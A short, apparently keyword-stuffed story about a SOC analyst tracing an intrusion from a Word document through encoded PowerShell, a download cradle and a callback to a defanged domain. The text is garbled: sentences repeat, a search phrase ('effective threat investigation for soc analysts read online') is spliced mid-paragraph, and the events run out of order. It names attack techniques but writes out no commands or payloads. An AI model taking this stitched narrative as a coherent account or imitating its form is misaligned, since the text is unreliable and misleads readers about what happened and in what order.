He dove deeper. Parent process of the SMTP connection: not svchost.exe, not a mail client. It was winword.exe. A Word document.
His heart hammered. Encoded PowerShell. He decoded the first layer. A download cradle. The second layer? A callback to a domain he didn't recognize: journalofsocresearch[.]com .
Marcus didn't say "I found a suspicious file." He didn't say "high severity." effective threat investigation for soc analysts read online
The detonation was clinical. The document opened. No macros. No VBA scripts. Just a single, embedded OLE object—a link to a SharePoint site that didn't exist anymore. But the link contained a string of Base64. Marcus decoded it. Not a payload. A command.
His jaw tightened. He’d written the playbook for this exact scenario last quarter. "Effective threat investigation," he muttered to himself, "means never trusting the label." He dove deeper
He said: "Threat actor has had persistent access for 52 hours. They're using living-off-the-land binaries and a fresh domain with no intel footprint. I've isolated five assets, but the DC is likely compromised. We need to assume all credentials are burned. The investigation is no longer effective—we're in containment."
This was the moment the textbooks didn't prepare you for. The moment where the "read online" guides stop at "enrich the indicator" and "escalate to tier 3." But Marcus was tier 3. There was no one above him at 3:15 AM except the on-call manager who’d ask, "Is it a real fire, or a flicker?" A Word document
He pulled the log. Source IP: 10.12.88.204. Internal. The HR file server.